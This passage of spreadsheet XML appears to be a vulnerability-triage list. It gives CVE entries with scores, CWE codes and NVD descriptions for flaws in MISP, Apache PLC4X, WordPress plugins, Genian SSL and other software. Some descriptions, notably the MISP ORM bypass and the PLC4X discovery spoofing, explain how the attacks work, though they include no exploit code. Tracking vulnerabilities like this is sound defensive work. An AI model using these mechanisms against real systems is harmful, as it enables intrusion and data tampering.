        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97150</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>When converting baserCMS4-style addons to baserCMS5-style ones,
BcAddonMigrator includes "config.php" from the addon, which means the PHP code in the file is executed.
Arbitrary files on the system may be read or deleted by an administrative user.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97150</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102511</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-835, CWE-940</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Source of a Communication Channel in the ADS discovery of the Go implementation of Apache PLC4X (PLC4Go) allows an attacker able to send UDP datagrams to the discovering host to redirect subsequent connections to an arbitrary, attacker-chosen address. The discovery result's connection 
address was derived from the AmsNetId claimed in the response body rather than from the datagram's actual source address. One spoofed discovery response can therefore insert an inventory entry pointing at any host, including hosts outside the local network, and an application that connects to discovered devices
will open its ADS session, including any configured route credentials, to that host.
Additionally, discovery listeners in both implementations can be disabled by a single malformed datagram:
- In PLC4Go ADS discovery, a short version block causes a panic that ends the listener for the rest of the discovery call, so legitimate devices answering afterwards are not reported.
- In PLC4J, the ADS and EtherNet/IP discoverers stop on an unhandled exception from a malformed response.
- The PLC4J Modbus discoverer can be made to spin indefinitely, consuming a CPU core, by a scanned host that sends a partial response.
Exploitation requires the application to invoke the discovery API, which is opt-in, and for the connection redirect, to act on the discovered items.
This issue affects Apache PLC4X: PLC4Go from 0.11.0 before 1.0.0; PLC4J ADS and Modbus drivers from 0.10.0 before 1.0.0; PLC4J EtherNet/IP driver from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 derives the connection address from the datagram's source address and logs a warning when the claimed AmsNetId disagrees with it.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102511</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10739</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>2505284f-8ffb-486c-bf60-e19c1097a90b</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-59, CWE-73</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Cato Networks SDP Client for Windows before 6.12.6 allows a local user to delete arbitrary files with SYSTEM privileges via improper validation of a client-supplied SID over a local IPC named pipe.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10739</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94115</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Easy Pricing Tables &lt;= 4.1.2 versions.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94115</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94177</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in GamiPress &lt;= 8.0.2 versions.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94177</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97287</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Event Tickets &lt;= 5.29.5 versions.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97287</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97293</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Media LIbrary Assistant &lt;= 3.41 versions.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76146</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in Genian SSL PNS allows an attacker who knows only the client access ID, without the password, to execute arbitrary commands remotely</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76146</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103237</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper input validation vulnerability in its ORM save path. When a user submits data through various endpoints (attribute add/edit, event edit, free-text import, sighting capture, shadow attribute proposal, event report creation, object reference add, user admin edit), the application sanitizes the flat record by stripping the primary key and pinning the event_id or object_id to the caller's context. However, the underlying ORM's set() method gives priority to a nested key whose name matches the model alias and discards the outer scalar fields.
An authenticated user with basic write permissions can exploit this by embedding a nested block under the model alias key inside their request. The sanitization logic (id removal, event_id pinning) is applied to the outer record, but the ORM binds to the inner record instead, which carries an attacker-chosen id and event_id. This allows the attacker to overwrite, re-parent, or soft-delete rows belonging to other organizations or events they have no read access to.
Impact:
- Cross-tenant data integrity compromise (attribute values rewritten, objects re-parented to attacker events, rows soft-deleted)
- Affects multiple entity types: Attribute, Object, EventReport, Sighting, AttributeTag, ShadowAttribute
- Requires only a low-privilege authenticated account with perm_add
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103237</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103321</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site script (XSS) vulnerability in the event graph preview feature.
The event graph preview image field was accepted and stored without server-side validation. On the client side, the stored value was rendered into an HTML img element's src attribute via string concatenation, allowing a crafted value to break out of the attribute context and inject arbitrary script.
Preconditions:
- An authenticated MISP user with the ability to create or modify an event graph entry.
- A second user (the victim) who views the event graph and triggers the preview popover.
Impact:
- Execution of arbitrary JavaScript in the victim's browser within the MISP application context.
- Potential theft of session tokens, cookies, or sensitive data accessible to the victim's browser.
- Potential for performing actions on behalf of the victim within the MISP application.
Affected: MISP versions prior to the fix (commit applied after v2.5.48).</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103321</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46711</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, the workspace HTTP service that listens on 0.0.0.0:8080 inside each sm-ws-* Fly Machine exposes endpoints (/health, /file/&lt;path&gt;, /archive/&lt;dir&gt;) without any authentication or origin check. Any host that can reach TCP/8080 on a workspace can read arbitrary files under that workspace's /workspace root and download whole project trees as tar archives. Because every workspace shares the same Fly private 6PN and resolves all peer addresses via the unauthenticated _instances.internal TXT record, every other sm-ws-* machine on the same Fly app/org is a reachable, unauthenticated attacker — the trust boundary (workspace owner ↔ everyone-else) is missing. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46711</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100273</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 authorisation bypass in the scripts debugger allowed arbitrary code execution</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100273</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102984</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/node</t>
        </is>
      </c>
      <c r="M121" s="5" t="inlineStr">
        <is>
          <t>11.1.3</t>
        </is>
      </c>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 11.1.3, the @astrojs/node adapter builds a request URL from the Host header, and a malformed port can make that URL invalid. The recovery path reuses the same malformed host and throws an uncaught TypeError: Invalid URL before routing begins. In the default standalone configuration, the request returns an HTTP 500 response and the server continues running, but when staticHeaders is enabled the synchronous handler does not catch the exception and the Node process terminates. Proxies and CDNs that reject malformed Host headers prevent this path from reaching the origin. The issue affects availability only and does not expose data or permit code execution. This issue is fixed in version 11.1.3.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102984</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102990</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>node.js, express</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>basic-ftp is an FTP client for Node.js. Prior to 6.2.1, Client.list() can be forced by a malicious or compromised FTP server to spend quadratic CPU time parsing a directory listing because the RE_LINE expression in src/parseListUnix.ts backtracks across adjacent variable-length owner and group fields when a long Unix-style line has a valid prefix but cannot satisfy the later size and date fields. parseList() selects a parser from the last nonblank line and then applies it to every line, so a normal final line can select the Unix parser while an earlier crafted line blocks the Node.js event loop and freezes the process. This issue is fixed in version 6.2.1.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102990</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93621</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in WP Data Access &lt;= 5.5.84 versions.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93621</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96817</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
